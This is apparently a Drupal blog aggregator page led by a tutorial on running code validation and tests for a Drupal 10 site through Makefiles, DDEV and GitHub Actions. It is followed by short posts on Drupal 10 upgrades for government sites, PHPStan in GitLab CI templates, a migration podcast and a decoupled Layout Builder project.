The function is implemented using custom code, which determines the location through cookies, filters site elements, etc.

Nov 12 2023
Nov 12

There are a number of different tools that allow you to validate and test a Drupal site. Inspecting your custom code allows you to adhere to coding standards and ensure that you stamp out common coding problems. Adding tests allows you to make certain that the functionality of your Drupal site works correctly.

If you have tests in your Drupal project then you ideally need to be running them at some point in your development workflow. Getting GitHub to run the tests when you push code or create a pull request gives you peace of mind that your test suite is being run at some point in the workflow. You also want your tests to be easy to run locally, without having to remember lots of command line arguments.

In this article I will show how to set up validation and tests against a Drupal site and how to get GitHub to run these steps when you create a pull request. This assumes you have a Drupal 10 project that is controlled via composer.

Let's start with creating a runner using Makefile.

Makefile

A Makefile is an automation tool that allows developers to create a dependency structure of tasks that is then run by using the "make" command. This file format was originally developed to assist with compiling complex projects, but it can easily be used to perform any automation script you need.

For example, let's say that we want to allow a command to be run that has a number of different parameters. This might be a curl command or even an rsync command, where the order of the parameters is absolutely critical. To do this you would create a file called "Makefile" and add the following.

sync-files:
	rsync -avzh source/directory destination/directory

To run this you just need to type "make" followed by the name of the command.

make sync-files

You now have a repeatable task that will run the same command in exactly the same way every time.

This is preferable to creating individual shell scripts for each action, as with a Makefile you can create dependencies between your tasks. So, in the above example, we could say that before we run the rsync command we need to create the destination directory. All we have to do is create another task that performs this action and set it as a prerequisite of the sync-files command.

create-destination-directory:
    mkdir -p destination/directory

sync-files: create-destination-directory
	rsync -avzh source/directory destination/directory

One thing I use quite often is the "@" symbol at the start of the commands. This tells make to run the command, but not to print the command being run on the command line. This cleans up the output a little, but it is really down to personal preference. Here's the same rsync command with this option added.

sync-files:
	@rsync -avzh source/directory destination/directory

There's a lot more to Makefiles than I can cover here, but this is essentially the basic setup. Whilst it is a little tricky to get into the syntax of a Makefile, they can be useful for quickly running tasks that would otherwise mean looking up parameters or copying from a text file of useful commands.

If you want to know more about make then I can recommend reading https://makefiletutorial.com/ as this will take you through all of the syntax of a Makefile in simple to understand examples.

The idea behind using Makefiles here is to simplify the process of running commands on GitHub, but also to make it easier for developers to run the same commands. Makefiles make it easy to group everything under a single command using the prerequisites feature. Doing this will allow you to install Drupal and run the entire testing stack using just a single command.

Alternatively, you can use Composer scripts or some other automated script to perform the tasks, although Composer scripts don't support dependencies, so you might need to create a series of bash scripts to perform the actions. It's also possible to use something like Robo to run tasks for you, and I have experimented with this in the past. Ultimately, you need some way of installing your PHP dependencies before you can run them, which means you need a Makefile or script somewhere in your workflow.

Whatever technology you select, the key to simplifying your GitHub workflows is weighting the commands more on the Makefile side, which means your GitHub actions can be nice and concise.

DDEV

In order to simplify the tasks being run (and the environment they are run on) I tend to use DDEV. Using this platform allows for a consistent and repeatable environment that you can easily configure to have different setups. The rest of the examples in this article will feature the "ddev" command (where appropriate) that will execute the command within the docker environment created by DDEV.

Using a docker environment also means that all of the paths for the system will be the same on every machine that runs the environment, which helps to simplify the setup process.

DDEV is useful when you want to perform updates and need to ensure that they function correctly. For example, if you want to see if your site will function on a new version of PHP then you just need to make that change in the configuration and create a pull request. The GitHub actions will find the new configuration and perform your tests with the new version in mind.
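For example, changing the PHP version is a one-line edit in the project's .ddev/config.yaml file (the version shown here is just an example):

# .ddev/config.yaml
php_version: "8.2"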

Install Drupal

The first task to perform with any setup is to install Drupal, starting with the Composer packages and any node packages we may require. When we start a DDEV environment it will automatically copy the Drupal settings.php file into the correct place, so we don't need to worry about that here.

Once the Drupal codebase is in place you can then install Drupal and compile any theme assets required. The following make command will install composer and node packages and then hand off the Drupal install and theme compile tasks to secondary make commands.

setup-drupal:  ## Install dependencies, install Drupal, and compile the theme.
	@ddev composer install --prefer-dist --no-progress
	@ddev exec --dir=/var/www/html/docroot/themes/custom/my_custom_theme npm install
	@ddev exec npm install
	$(MAKE) site-install
	$(MAKE) themebuild

The site install command will install Drupal using Drush. I have found from experience that dropping and re-installing the database entirely helps ensure that the environment is clean. For example, when running migration tests you might find that if you don't drop all tables first then some of the migration tables will be present after you re-install the site. We also perform a cache clear as well as an additional configuration import to make sure that the site is up to date.

site-install: ## Install the Drupal site.
	@ddev drush sql-drop --yes
	@ddev drush si standard --existing-config --yes --account-name=admin --account-pass=admin
	@ddev drush cr
	@ddev drush cim -y

This does assume that you are using the standard install profile to install your site (not always the case) and that you have some configuration to import. If you are using multi-site setups then you'll need to change this to install one or more variants of the site for testing.

Once that task is complete the Drupal site will be running.

It's at this point that you might want to think about using Default Content Deploy to inject some testing content into your site. This isn't a requirement unless you are going to perform behavioural or regression testing on the site; having content present for those types of test is essential, and Default Content Deploy is the best way that I have found to do this.
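As a sketch, assuming the Default Content Deploy module is installed and content has previously been exported, a make task for the import could look like this (check the drush command name against your version of the module):

import-content: ## Import test content using Default Content Deploy.
	@ddev drush dcdi --yes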

The final step here is to build the theme assets, which will entirely depend on what package you use to manage your theme. I use grunt on a couple of projects so this is an example of using grunt to compile the theme assets.

themebuild: ## Build the theme.
	@ddev exec --dir=/var/www/html/docroot/themes/custom/my_custom_theme npx grunt

I should note that there are no extra installation steps to perform before we can run npm or npx, as these packages come pre-installed with DDEV.

Validation

Before we start testing the code we need to make sure that it is valid. I normally separate out the validation and the testing workflows as there is no point in wasting time on running a full test suite if some of the code in your codebase is invalid.

There are a number of things we can do to ensure that a Drupal codebase is valid, starting with validating the composer files.

Composer Validate

The simplest validation task we can run is to validate the main composer.json and composer.lock files, which is achieved with the command "composer validate".

composer-validate: ## Validate Drupal composer.json and composer.lock.
	@ddev composer validate

Having invalid composer files can often mean that something went wrong during the composer workflow and can cause problems later down the line when you attempt to update composer packages again. 

PHP Code Sniffer

PHP Code Sniffer allows you to check your Drupal custom code against the Drupal coding standards. There are a lot of reasons to use coding standards in your project, not least of which is ensuring that common bugs and security issues are corrected before they reach your production environment. PHP Code Sniffer will also check your Drupal YAML configuration files to ensure that no common issues are found.

To install PHP Code Sniffer on a Drupal codebase you can follow along with my article detailing how to install and run the tool.

Once installed you can run the phpcs command to inspect your Drupal codebase. As this requires a fair number of arguments, we create a make command to do it for us.

phpcs: ## Run phpcs analysis.
	@ddev exec vendor/bin/phpcs --standard=Drupal,DrupalPractice --exclude=SlevomatCodingStandard.Namespaces.AlphabeticallySortedUses --extensions=php,module,inc,install,test,profile,theme,info,txt,yml --ignore=node_modules,bower_components,vendor web/modules/custom web/themes/custom web/profiles

Remember that we are only interested in the PHP code we have written ourselves, which means we specifically point the phpcs command at our custom codebase. There's no point in inspecting the entire Drupal core and contributed codebase as this will have already been checked by the tools available on drupal.org.

PHP Code Sniffer also comes with the PHP Code Beautifier and Fixer tool, which can be run with the phpcbf command.

phpcbf: ## Run phpcbf.
	@ddev exec vendor/bin/phpcbf --standard=Drupal,DrupalPractice --extensions=php,module,inc,install,test,profile,theme,info,txt,yml web/modules/custom web/themes/custom web/profiles

The phpcbf tool can be used to fix a lot of coding standards errors quickly, so it's useful to add to your make file so that you can easily run it.

Note that all of the paths in the above command must exist in order for the tool to run correctly. You can remove "web/profiles" if you are not making use of install profiles on your site.

PHPStan

PHPStan is a tool that will statically analyse PHP code to look for common problems that might cause bugs. It needs a couple of helper packages to install the tool, but I have written all about how to install and use PHPStan in a Drupal codebase. You also need to create a phpstan.neon configuration file, which is automatically picked up by the tool when run.
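For reference, a minimal phpstan.neon might look something like the following. The paths and level here are examples, and the includes assume the helper packages mentioned in that article (they are unnecessary if you use phpstan/extension-installer):

includes:
  - vendor/mglaman/phpstan-drupal/extension.neon
  - vendor/phpstan/phpstan-deprecation-rules/rules.neon
parameters:
  level: 1
  paths:
    - web/modules/custom
    - web/themes/custom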

Once installed and configured, the tool can be run through make.

phpstan: ## Run PHPStan analysis.
	@ddev exec vendor/bin/phpstan

To make the best use of PHPStan you need to set it to the right level; this is all handled in the phpstan.neon file, so the make command just needs to run the tool. My advice is to start at level 0 and solve everything that is uncovered by the tool. Then agree with the rest of your team what level you want to reach, so that everyone is on the same page.

ESLint

ESLint is a static analysis tool that checks your JavaScript for best practices and potential bugs. It can also be used to validate the syntax of your YAML files, which can catch issues that the PHP Code Sniffer inspection might miss.

Drupal comes with everything you need to get up and running with ESLint, and the setup-drupal command at the start installed the tool as part of the "npm install" command.

You need to create an .eslintrc.json file in the root of your project (if this isn't already present) to configure the tool. The "rules" area of this file allows you to turn off certain inspection criteria, which is useful if you want to use things like "++" in your custom code.

Here is an .eslintrc.json file that I often use in projects. Auto-detection of the React version is also added to this file; it corrects a small warning that appears when the tool is run.

{
  "extends": "./web/core/.eslintrc.json",
  "rules": {
    "no-plusplus": "off"
  },
  "settings": {
    "react": {
      "version": "detect"
    }
  }
}

It's also a good idea to have an ignore file that you can use to skip over anything that you don't want to lint. This is the case if you have any vendor directories in your codebase that contain third-party packages in them.

docroot/modules/custom/my_custom_theme/js/vendor/

Once you have that in place you can run the eslint tool, passing in the configuration file with the -c flag and the ignore file with the --ignore-path flag.

eslint: ## Run eslint.
	@ddev exec npx eslint -c .eslintrc.json --ignore-path .eslintignore web/modules/custom
	@ddev exec npx eslint -c .eslintrc.json --ignore-path .eslintignore web/themes/custom

To assist your team locally you can add an "eslint-fix" task that will attempt to fix any coding standards issues that the tool finds.

eslint-fix: ## Run eslint with the --fix flag.
	@ddev exec npx eslint -c .eslintrc.json web/modules/custom --fix
	@ddev exec npx eslint -c .eslintrc.json web/themes/custom --fix

Running eslint-fix can often solve the majority of the issues detected, which means you can concentrate on fixing the issues that matter.

Again, note that the directories here must exist before they can be scanned. If one doesn't exist in your project, you can comment out that line with a "#" at the start.

Testing

Ideally, you should have a number of tests in your Drupal site. These can be split into unit tests and behavioural tests, but it is essential that we can run them on any platform required.

PHPUnit

Drupal's internal testing system is powered by PHPUnit and can be used to test individual functions, service classes, or user interaction.

To get PHPUnit running on your Drupal site you need to copy the phpunit.xml.dist file from the core directory in your Drupal install into the root of your project. There are a few settings in the file that need changing so that they point at the correct place, but once done you can commit this file to your project.
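The settings in question are mostly environment variables in the <php> section of the file. For a typical DDEV project they might look something like this; the values are examples and will depend on your environment:

<php>
  <env name="SIMPLETEST_BASE_URL" value="https://my-site.ddev.site"/>
  <env name="SIMPLETEST_DB" value="mysql://db:db@db/db"/>
  <env name="BROWSERTEST_OUTPUT_DIRECTORY" value="/var/www/html/private/browsertest_output"/>
</php>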

The tests themselves are easily run inside the DDEV environment, but we first need to ensure that the correct output directories are in place (with the correct permissions) before we can run the tests. The following make command handles this.

phpunit: ## Run the Drupal phpunit tests for custom code.
	@ddev exec mkdir -p /var/www/html/private/browsertest_output
	@ddev exec chmod -R 777 /var/www/html/private/browsertest_output
	@ddev exec mkdir -p web/sites/simpletest/browser_output
	@ddev exec chmod -R 777 web/sites/simpletest
	@ddev exec ./vendor/bin/phpunit web/modules/custom/

This will run the unit tests across all of the custom modules in the project.

Cypress

Cypress is a behavioural testing system that acts like a user on your Drupal site, logging in and interacting with it. These types of tests are tricky, as they need to be run on your local environment. Well, that's not strictly true, as they can run in a headless browser on any environment, but I've often found that the best results come from running them locally.

I often install Cypress next to the Drupal web root in a directory called "tests/cypress", so the following examples take that into account.

cypress: ## Run Cypress tests
	cd tests/cypress && npx cypress run

Cypress tests don't have access to the Drupal database, so there's also the question of managing the environment for the tests themselves. I've found that re-installing Drupal can lead to timeout errors on some environments, so I tend to opt for a re-import of the content using Default Content Deploy. I have written about using Cypress and Default Content Deploy in a previous article.
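For completeness, here is a minimal (hypothetical) Cypress spec, assuming baseUrl is set in your Cypress configuration:

// tests/cypress/cypress/e2e/front-page.cy.js
describe('Front page', () => {
  it('loads and renders content', () => {
    cy.visit('/');
    cy.get('body').should('be.visible');
  });
});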

One command that I also include is a shortcut to the Cypress GUI, which is a powerful development tool that shows the tests being run in real time.

cypress-gui: ## Open the Cypress GUI
	cd tests/cypress && npx cypress open

Makefile Meta Steps

To speed things up you should create meta steps in your Makefile so that you can run lots of actions at once using the prerequisites feature. We just set up a load of tasks for validating and testing the codebase, and it doesn't make sense to run them one by one. Using the prerequisites feature means that we can create simple make tasks that only run the tasks we have already created.

To this end we need to make two tasks, one for validation and another for tests. The "validate" make command is perhaps the busiest:

validate: composer-validate phpcs phpstan eslint ## Validate the project.

The tests can then be run in one go with a "test" make command.

test: phpunit cypress ## Run all of the tests.

With these tasks in hand we can now create our GitHub workflows.

GitHub Workflows

At this point you should be able to run either all or part of your install and test process using the Makefile. I won't go into too much detail here about the GitHub workflow file, as there is already some pretty good documentation on the file itself. Instead, I will go through the creation of a workflow file that will run all of the validation and tests for our Drupal site.

The workflow YAML file needs to live in the directory ".github/workflows/". I tend to call my file "test.yml" since this perfectly describes what it is doing.

The start of the file contains the name and details about when the workflows will be run. It is possible to get GitHub to run your workflow on a variety of different events on the platform.

The following shows the start of a typical GitHub workflow file that details the name and a number of actions. In this case we will run the workflow when a commit is pushed to a branch starting with the name "feature/", or when a pull request is created against the branches "main" or "stage".

name: Run tests

on:
  push:
    branches:
      - 'feature/**'
  pull_request:
    branches:
      - main
      - stage

Next is the section that details the jobs that must be run for this workflow. The "test" workflow detailed below will run on the latest version of Ubuntu and has a number of steps.

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
       # Steps go here...

Let's define a few steps.

First, we need to check out the codebase we want to test, which is done using the "actions/checkout" package. There are a lot more options available in this package, but we only need the default options for our purposes.

- name: Check out repository code.
  uses: actions/checkout@v4

As we are using DDEV we also need to include a step to let GitHub know about DDEV. This is done using the ddev/github-action-setup-ddev package. Again, there are lots of options available for this system, but as the DDEV environment will be automatically run we don't need to do anything else here.

- name: Include ddev runner.
  uses: ddev/github-action-setup-ddev@v1

With the DDEV environment ready we can now start installing the site, which is done using the "make setup-drupal" command we created at the start. Once this task has finished the site will be fully running within the DDEV environment on GitHub.

- name: Setup drupal for testing.
  run: make setup-drupal

Before running the tests we need to run our validation tasks using the "make validate" command.

- name: Run validate handler.
  run: make validate

Here is where our workflow differs slightly from the local environment. The PHPUnit tests and the Cypress tests need to be run in separate tasks due to the way in which the Cypress tests are run (more on that in a minute). To run the PHPUnit tests we just call our "make phpunit" command.

- name: Run test handler.
  run: make phpunit

The best way I have found of running Cypress tests on GitHub is by using the cypress-io/github-action package. This sets up everything we need for our Cypress tests to run; we only need to include the "working-directory" directive, as the Cypress tests aren't in the root of our project.

- name: Run cypress tests.
  uses: cypress-io/github-action@v6
  with:
    working-directory: tests/cypress

This task will automatically trigger our Cypress tests and will return the correct failure state if one of them fails.

That's all we need to add to our GitHub workflow file, here it is in full.

name: Run tests

on:
  push:
    branches:
      - 'feature/**'
  pull_request:
    branches:
      - main
      - stage

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - name: Check out repository code.
        uses: actions/checkout@v4

      - name: Include ddev runner.
        uses: ddev/github-action-setup-ddev@v1

      - name: Setup drupal for testing.
        run: make setup-drupal

      - name: Run validate handler.
        run: make validate

      - name: Run test handler.
        run: make phpunit

      - name: Run cypress tests.
        uses: cypress-io/github-action@v6
        with:
          working-directory: tests/cypress

The file we create here is deliberately short because we added the complexity to the Makefile, rather than to this file. It also means that the configuration for your system lives in your codebase, rather than in the workflow files.

Now that everything is in place you should check the actions permissions of your project in GitHub to make sure that you can actually run the workflow. These are the main permissions you should be looking at (shown here within the "hashbangcode" GitHub profile).

The GitHub workflow dialog in the project settings of GitHub.

This "allow all actions" is quite an open permission, but it allows us to use actions from different repositories to checkout the code, run DDEV, and perform Cypress tests.

With all this in place you can now perform validation and testing checks on your Drupal codebase by either pushing to a "feature/x" branch or by creating a pull request against the main or stage branches.

Conclusion

With this technique in hand you can now push code to GitHub and automatically run validation and testing steps on your code. This provides a reliable safety net, so that you can be sure that everything is compliant and works correctly with every change that is added to your system.

I wanted to provide as much detail as possible to allow anyone to create their own workflows and actions in a few minutes and get started with continuous integration on GitHub. Even if you have no tests in your Drupal project, you can make a start with code validation and then start writing tests using the details posted here. Let me know if you get stuck with any part of this; I would appreciate the feedback.

The addition of workflows also integrates nicely with the GitHub interface. All workflows that pass will receive a nice little green tick, showing that they cleared all of the validations and checks in your workflow.

It is possible to take the GitHub workflow file a lot further than I have shown here, but I've found that adding complexity to this file makes the workflow much harder to debug. If you are able to go from a blank slate to a fully validated and tested environment locally using one or two make commands, then there's a good chance that the same will apply on GitHub.

The GitHub workflow can be taken in other directions as well. For example, you can also create a workflow that will trigger a deployment of your code to the platform of your choice. Again, I would suggest passing the actual build process off to another application like Ansible or Deployer, rather than add that complexity to the GitHub workflow file.

Deliberately adding the complexity of the project setup and validation/testing steps to the Makefile also allows us to port this technique to other systems with relative ease. For example, if we wanted to use GitLab then we could create a ".gitlab-ci.yml" file and add the needed make commands to that file in order to trigger the same actions on that platform. You would need to account for the presence of DDEV in that environment, but there are ways around this, such as dropping the DDEV wrapper and opting for pure docker commands if required.
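As a rough sketch only, and assuming you have solved the DDEV availability problem on your runners, the GitLab CI equivalent could be as small as this:

# .gitlab-ci.yml (sketch; assumes a runner where DDEV or an equivalent is available)
test:
  script:
    - make setup-drupal
    - make validate
    - make phpunit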

Nov 10 2023
Nov 10

Takeaway: Upgrading to Drupal 10 isn't just about making a technical switch due to Drupal 9’s end of life; it's a commitment to ensuring your government website remains secure, compliant, and accessible. By making this move, you're not only keeping your platforms current but also enhancing your service to your citizens, showcasing your dedication to excellence in online services.

Although the majority of this list is aimed at developers, it's still important to know what the upgrade will look like and how you can coordinate with the developers to ensure a smooth process.

Most of my Drupal 9 to 10 upgrade experience for a government website comes from working on the Teachers' Retirement System of the State of Illinois (TRSIL) project. However, I'll also be adding some information from my experience with the American Camp Association upgrade project.

Let's begin.

TRS Illinois Homepage

The Drupal upgrade checklist for government websites

In this section, I'll walk you through the entire upgrade process from Drupal 9 to Drupal 10, from preparations to post-deployment considerations.

Drupal 10 upgrade checklist

Before the upgrade

  1. Clarify your hosting environment: Different hosting platforms can influence the upgrade strategy. Ask your developer about your hosting environment, be it Acquia, Pantheon, or Platform.sh, and how it might impact the upgrade process.
  2. Prepare for the User Acceptance Test (UAT): The UAT is your chance to verify that you are satisfied with the upgraded site. While you don't need to know every technical detail, having a grasp of the primary features and functionalities is crucial. This knowledge will be invaluable when reviewing the upgraded site during the UAT phase.
  3. Give FYIs to the team (if any): Any information based upon previous experience updating your site will always be appreciated by the developers, especially if you have information on site features that are complicated. If you’re a new Promet client, this information is helpful but not required, since our developer will be doing the audit and the project manager will work with you on client testing plans.
  4. Review the Drupal upgrade audit: The audit takes about 8 to 15 hours, then the findings are put in a spreadsheet and given to the project manager. They’ll be assigning this to you for review. Once approved, we will proceed with the upgrade.
  5. Ensure data safety: Once the code is deployed, we have a contingency plan in place in case any issues arise. I refer to this as the Project Rollback Plan. For instance, with the American Camp Association, Project Manager Mary Rowell formulated a rollback strategy in the event of a deployment failure. If your team doesn’t have one, ask your developer to back up all data, configurations, and codes before starting the upgrade. It's essential to protect your site's information and provide a safety net in case anything goes wrong.

During the upgrade

  1. Stay updated on the workflow: Different hosting platforms might have unique workflows. Feel free to ask your developer about the specific steps they're taking, especially if you're not familiar with the platform you have. For instance, with Pantheon, multi-dev environments are a great feature the developers can use, but other platforms may not have them.
  2. Monitor module upgrades: One of the critical steps in the upgrade is updating the modules. Some might be deprecated, requiring patches or replacements. Regularly check in with your developer about the status of these modules, especially if you're aware of any that you absolutely need and don’t want to be replaced.
  3. Be ready for the UAT: Once the developer has completed the upgrade on a test environment, it's time for the UAT. This is your opportunity to ensure the features and functionalities you familiarized yourself with before the upgrade began are all working properly. Engage with your team, especially those who use the site daily, to gather feedback.
  4. Ensure continuous communication: Regular updates from your developer are crucial. Check the ticket to see the status of the upgrade, challenges faced, or any other critical information. Maintaining open communication ensures you're always in the loop.

After the upgrade

  1. Engage in thorough testing: Even after the upgrade, it's essential to continue testing the site. For example, our team performs smoke testing, where we list specific test cases the site needs to pass. If your team doesn’t perform this, ask what kind of tests they have available to ensure that all functionalities are intact and working as expected.
  2. Stay alert for any issues: While our quality assurance team (QA) is thorough, we still don’t know your site as well as you do, and some issues only arise in the production environment. With TRSIL, if I remember correctly, only QA checked the site, and the client found an issue a couple of weeks post-deployment. It was an easy fix, but it was found pretty late. That’s why we suggest performing the UAT alongside our QA whenever possible.

What is the difference between Drupal 9 and Drupal 10?

Sign up for the Drupal 10 Ask Us Anything webinar.

Government websites are entrusted with sensitive information, making their security doubly important. Drupal has always been at the forefront of web security, and the latest version brings several improvements over its predecessor, Drupal 9.

Drupal 10.0 uses the Symfony 6.2 framework, and later Drupal 10 minor versions will use Symfony 6 minor versions.

Because Symfony is an actively maintained framework, you can rest assured that you’ll be getting regular security updates. Drupal 9’s “Managed Permissions” and Content Editor role are also here to stay.

Another area where Drupal 10 excels is accessibility. With features like the upgraded CKEditor 5, Drupal 10 is more user-friendly for content editors, making their work a whole lot easier.

Drupal 10 also introduces flexible, responsive grids that adapt more smoothly to different screen sizes, ensuring that your constituents have a seamless experience whether they're on a desktop or a smartphone.

By moving away from older technologies like Internet Explorer 11, Drupal is not only keeping up with current web standards but also prioritizing security and efficiency.

Integration capabilities are also a highlight of Drupal 10. Compared to Drupal 9 at its release, Drupal 10 launched with almost three thousand compatible extensions, a 26% increase.

With Drupal 10, IT professionals in government can be confident in their website's ability to offer the latest features while adhering to the highest standards of security, compliance, and accessibility.

Is Drupal 10 easy to maintain?

When you're looking after a government website, you quickly realize how much the platform's architecture matters.

I've noticed that how easy a site is to maintain often comes down to how it was first set up. If everything was done right from the start, with clean and efficient code, then keeping that site running smoothly is a breeze.

It's not so much about Drupal 9 vs Drupal 10, but more about the quality of the work that went into the site in the first place.

That said, Drupal 10 does have some features that can make maintenance easier. For example, if your site doesn't have a ton of third-party integrations, it's going to be simpler to look after. But when you start adding in lots of integrations and third-party software, that's when things can get tricky.

You might run into issues when you're updating the core software or any of those third-party bits and pieces. So, the more complex the project, the more challenges you might face.

All in all, while Drupal 10 offers a great starting point, how easy it is to maintain also depends on how well it was built and how complex the project is. A well-made site is always going to be easier to handle, no matter which version of Drupal it's on.

How cost-effective is it to upgrade to Drupal 10?

When considering an upgrade, it's essential to weigh the costs. Upgrading to Drupal 10 is not just about the immediate expenses but also about the long-term benefits and potential savings.

In my experience with the American Camp Association's upgrade, we had set an estimate for the project, and I'm proud to say we stayed within the allotted hours.

The transition from Drupal 9 to Drupal 10 was smooth and cost-effective. However, it's worth noting that this might not always be the case for more complex rebuilds or migrations, like moving from Drupal 7 to Drupal 10, which can be more time-consuming and potentially exceed the initial budget if not set up properly.

Project Manager Amy Kim also mentioned that the original estimate for the TRSIL project was between 63 to 168 hours. The project took a total of 102 hours, which was close to her guesstimate of 94 hours.

This goes to show the importance of accurate estimations and the efficiency of our upgrade process, so working with a project manager who understands how to estimate is crucial.

Amy also stressed the cost of not upgrading. Delaying core or module updates can complicate and prolong the upgrade process in the future. In the long run, it's more economical to make smaller, incremental updates to keep the site secure and up-to-date.

Why choose Promet for your Drupal 10 upgrade

When it comes to upgrading your government website, you want a team that not only understands the technical aspects but also appreciates the unique challenges and requirements of government projects.

Having been a Drupal developer for over four years, I've had the privilege of working on various projects, including government websites.

Upgrading the TRSIL website from Drupal 9 to Drupal 10 was a significant milestone for me, and the challenges we overcame, such as addressing deprecated modules and configurations, have equipped us with invaluable insights for future projects (like yours).

But it's not just about my experience. All of our developers have successfully completed Drupal 10 updates. We also have a whole team including SysAdmin, QA, and our diligent PMs who ensure that every project is handled with utmost care. The PMs' role in creating rollback plans and ensuring projects stay within the estimated hours showcases our commitment to delivering quality while being cost-effective.

Our approach is also collaborative. We believe in keeping our clients informed and involved. Whether it's reviewing the initial audit, performing the UAT, or working with you to address any challenges during the upgrade, we ensure transparency and open communication.

Lastly, because of our continuous effort in contributing to the Drupal community and ensuring we are at the top of our game when it comes to upgrading and migrating clients, working with us means you’ll be working with both a Certified Enterprise Grade Migration Partner and a Certified Mid Scale Migration Partner.

Promet Source is a trusted Drupal migration partner


Making the right choice for your organization

Deciding to jump into a new platform or version is a big deal, especially since government websites serve as the backbone of our communities. Government websites are all about building trust and serving constituents. And from what I've seen, Drupal 10 is up for the task.

Government websites, whether a municipal website or a State website, have their own set of challenges. They have to be solid in terms of security, accessibility, and user-friendliness. Having worked on projects like TRSIL and the ACA, I can vouch for Drupal 10.

But here's the thing: The perks of Drupal 10 aren't just about its features. A smooth upgrade can make things run like a well-oiled machine, boost your site's functionality, and just make things easier for everyone. Think of it as leveling up your toolkit to better serve your community.

So, if you're on the fence about the upgrade, think about the bigger picture. With the right team and know-how, making the move to Drupal 10 can be a game-changer for the long haul. Contact us today and we’ll give you a quote within 48 hours.

Drupal 10 migrated clients logos

Nov 08 2023
Nov 08

Do you recognize the problem of your Drupal website not sending emails? For example, when there's a (security) update or when someone has filled out a Webform. In this blog, I'll show you in a few simple steps how to ensure that the emails your Drupal website sends always get delivered.

Postbode
Nov 07 2023
Nov 07
Published on Tuesday, 7 November 2023

The Drupal Association has been working on a monumental effort to migrate away from our bespoke DrupalCI continuous integration system to GitLab CI as part of the GitLab Acceleration Initiative. Drupal core's test runs are five times faster using GitLab CI. I have loosely followed the progress as Drupal moves from our custom-built infrastructure onto GitLab. But someone shared with me a little feature I missed: adding a PHPStan job to the default GitLab CI templates!

Fran Garcia-Linares (fjgarlin) is the engineer from the Drupal Association who has been working on the GitLab CI templates. GitLab supports templates to allow reusing configuration for continuous integration workflows. The new phpstan job does a handful of things, and I love its approach.

  • Allows modules to commit a phpstan.neon file to provide customized PHPStan configuration, such as level: 9 or specific errors to be ignored.
  • Exports errors as a JUnit report, GitLab quality report for the user interface, and terminal output for users to manually review.
  • Generates a baseline file, uploaded as an artifact, that can be committed to the project so maintainers can start using PHPStan straight away and accept all existing errors to be fixed later on (see the sketch after this list)!
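As an example (a sketch only; the exact options depend on your module), a committed phpstan.neon that raises the level and adopts a generated baseline might look like this:

includes:
  - phpstan-baseline.neon
parameters:
  level: 9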

What I found very creative was the way each report has been generated. PHPStan uses a result cache to make subsequent scans faster. The phpstan job uses this to create multiple reports from the results. It runs PHPStan three times with different outputs, capturing the exit code after each job run and generating the baseline.

With most of my open source work being on phpstan-drupal or Retrofit, I haven't worked on Drupal modules that often recently. I haven't had a chance to try out GitLab CI on Drupal.org yet. I need to set aside some time to check it out!

Is your module using GitLab CI yet? If not, check out the extensive documentation: https://www.drupal.org/node/3356364/


Nov 07 2023
Nov 07

This first episode of the Drupal Migration series of Tag1 Team Talks focuses on the intricate process of migrating large-scale applications, especially with the end of life of Drupal 7 and 9 approaching. The hosts, Michael Meyers and Janez Urevc, are joined by a panel of additional experts, Benji Fisher, Lucas Hedding, Mauricio Dinarte, and Mike Ryan, who delve deep into the world of Drupal migrations. This discussion explores the terminology used in migrations and some best practice approaches to the process, aiming to equip you with the knowledge to navigate the upcoming talks on this topic.


Overview

The panel discusses the nuances of migration, touching upon the differences between terms like upgrade, update, and migration and how they apply in different contexts. They emphasize the complexity of migrating from older systems to newer ones, highlighting the substantial changes in code organization and database structure. The conversation also covers the critical task of porting code and themes, focusing on the challenges and strategies of migrating Drupal themes. The panel shares personal experiences, underscoring the importance of considering the specific circumstances of each project when deciding whether to retain or redesign a theme during migration. The discussion extends to data migration. Mike Ryan elaborates on the Extract, Transform, Load (ETL) system employed in Drupal's migration API, emphasizing its flexibility and efficiency in handling data row by row.

As the episode wraps up, the panel hints at the rich history and evolution of the Migrate module, setting the stage for future discussions that promise to delve deeper into the world of Drupal migrations. The conversation underscores the critical role of meticulous planning and understanding of the migration landscape, especially when transitioning from older Drupal versions to newer ones. The panel encourages listeners to stay tuned for upcoming episodes that will offer a more detailed exploration of the topics in this introductory session, promising a wealth of insights and knowledge sharing in the series ahead.

For a transcript of this video, see Drupal Migrations: Getting Started.

Important Links:

Photo by Julia Craice on Unsplash

Nov 06 2023
Nov 06

Since DrupalCon Pittsburgh, we've been working on a decoupled Layout Builder for Drupal. We've reached the end of the statement of work, so let's recap the requirements and discuss what’s next.

Requirement 1: Create an npm package for developing decoupled components

Issue: https://www.drupal.org/project/decoupled_lb/issues/3375410

Taking inspiration from @wordpress/scripts, develop an npm package that has tooling for building and packaging decoupled components.

The MVP of this will include:
 • a script for building JS and CSS

Out of scope but for future consideration:
• linting
• a script for checking license compatibility

Release this as a package on npm in the @drupal namespace.

Delivery

Not only does the developed package support building CSS and JS via drupal-scripts build, but we also added support for initialising a new project and code generation with drupal-scripts init and drupal-scripts generate.

Requirement 2: Determine how to deal with externals in Webpack

Issue: https://www.drupal.org/project/decoupled_lb/issues/3375412 

Wordpress has @wordpress/dependency-extraction-webpack-plugin, a webpack plugin that extracts dependencies that are provided by Wordpress.

We don't have enough budget to go down the full 'roll our own' approach and it may be overkill for now. Instead, derive configuration for Webpack externals that ensures components don't bundle dependencies Drupal will guarantee to be present.

This config will likely be part of the package from requirement 1.

Out of scope but for future consideration:
Create our own plugin like Wordpress with some Drupal specific replacements

Delivery

As per our previous post, we used Vite externals and then wrote a module to add support for Import maps to Drupal. We wrote a new version of the React module that works with import maps.

Requirement 3: Provide a registry of React Layout Components

Issue: https://www.drupal.org/project/decoupled_lb/issues/3375413 

Create a simple layout registry and registration process for layout plugins. Create an MVP of some common layout plugins:
  • One column
  • Two column
  • Grid layout

Out of scope but for future consideration:
• Attempt to use the AST-generated Twig APIs to autogenerate React components that provide the markup for a layout plugin.
• Write a symfony/console command that can take the ID of a layout plugin and generate an equivalent React component.
• Bundle this as a part of a new experimental module.

Delivery

We wrote a context provider to create a layout registry and a way to pass this configuration from Drupal to React. We wrote React implementations of one and two column layouts.

Requirement 4: Persistence layer

Issue: https://www.drupal.org/project/decoupled_lb/issues/3375414 

Create an OpenAPI spec for the persistence layer. The MVP will include the following endpoints:
  • Choose section
  • Add section
  • Remove section
  • Choose block
  • Add block
  • Update block
  • Remove block

These will mirror existing HTML endpoints from layout builder.

